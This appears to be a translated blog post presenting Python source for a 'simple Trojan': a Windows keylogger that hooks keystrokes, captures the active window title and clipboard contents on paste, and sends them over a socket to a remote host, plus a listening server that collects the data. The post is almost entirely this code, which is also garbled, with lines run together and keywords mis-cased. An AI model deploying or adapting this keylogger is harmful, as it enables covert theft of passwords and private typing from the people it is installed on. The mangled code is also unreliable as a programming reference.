Python simple Trojan (i)

Reference Links:

Python writing simple Trojan Horse program

Refer to this blog to write

A few specific questions:

1. Configure the Pyhook module, cTYPES module, which requires these two pieces of wood to run successfully.

2. Combine the three modules to distinguish between the client and the sender server as the receiving party.

Combined: sender (monitored by)

#-*-coding:gb2312-*- fromcTYPESImport*ImportpythoncomImportPyhookImportWin32clipboardImportSocketImportThreadingdefSend (message):#Destination Address Ip/url and PortTarget_host ="***.***.***.***"Target_port= 9999#Create a Socket objectClient =Socket.socket (Socket.af_inet,socket. SOCK_STREAM)#Connecting the hostClient.connect ((target_host,target_port))#Send DataClient.send ("get/http/1.1\r\n"+message+"\r\n\r\n")    #Accept ResponseResponse = CLIENT.RECV (4096)#--------------------------------------------------User32 =Windll.user32kernel32=Windll.kernel32psapi=Windll.psapicurrent_window=Nonedefget_current_process ():#get top-level window handlehwnd =User32. GetForegroundWindow ()#Get Process IDPID =c_ulong (0) User32. GetWindowThreadProcessId (Hwnd,byref (PID))#storing process IDs in variablesprocess_id ="%d"%Pid.value#Request MemoryExecutable = Create_string_buffer ("\x00"*512) h_process= Kernel32. OpenProcess (0x400|0x10, False,pid) Psapi. Getmodulebasenamea (H_process,none,byref (executable),512)    #Read Window captionWindows_title = Create_string_buffer ("\x00"*512) Length= User32. Getwindowtexta (Hwnd,byref (windows_title), 512)    #Sendmessage = process_id+"    "+executable.value+"    "+windows_title.value Send (message)#Close HandowsKERNEL32. CloseHandle (HWND) kernel32. CloseHandle (h_process)#defining keystroke listener event functionsdefKeystroke (event):GlobalCurrent_window#detects if the target window has been transferred (and listens to other windows if another window is changed)    ifEvent. Windowname! =Current_window:#function Callget_current_process ()#Check if the keystroke is a regular key (not a key combination) and send    ifEvent. Ascii >32 andEvent. Ascii < 127: Message=Chr (event. ASCII) Send (message)Else:        #if a Ctrl + V event is found, the bar pasteboard content is sent        ifEvent. Key = ="V": Win32clipboard. OpenClipboard () Pasted_value=Win32clipboard. GetClipboardData () Win32clipboard. CloseClipboard () message=pasted_value Send (message)Else: Send (event. Key)#listen to the next keystroke event    returnTrue#Create and register the hook managerKL=Pyhook.hookmanager () kl. KeyDown=Keystroke#register hooks and executeKL. Hookkeyboard () pythoncom. Pumpmessages ()

Receiving Party:

#-*-coding:gb2312-*-ImportSocketImportThreading#Listening IP and PortsBIND_IP ="127.0.0.1"Bind_port= 9999Server=Socket.socket (Socket.af_inet,socket. Sock_stream) Server.bind ((Bind_ip,bind_port)) Server.listen (5)Print"[*]listening on%s:%d"%(Bind_ip,bind_port)defhandle_client (client_socket): Request= CLIENT_SOCKET.RECV (1024)    Print"[*]received:%s"%Request Client_socket.send ("ok!") Client_socket.close () whiletrue:client,addr=server.accept ()Print"[*]accept Connection from:%s:%d"% (addr[0],addr[1]) Client_handler= Threading. Thread (target=handle_client,args=(client,)) Client_handler.start ()

is to combine three modules to change the data sent to a record.

The issue is not resolved:

1. Hey, no use, although the function can be achieved, but the general anti-virus software can detect the program in the Monitoring keyboard input, practice playing it.

2. function is not perfect, no remote control function, throw him out can only accept information.

3. Not perfect mouse monitor and function.

Python simple Trojan (i)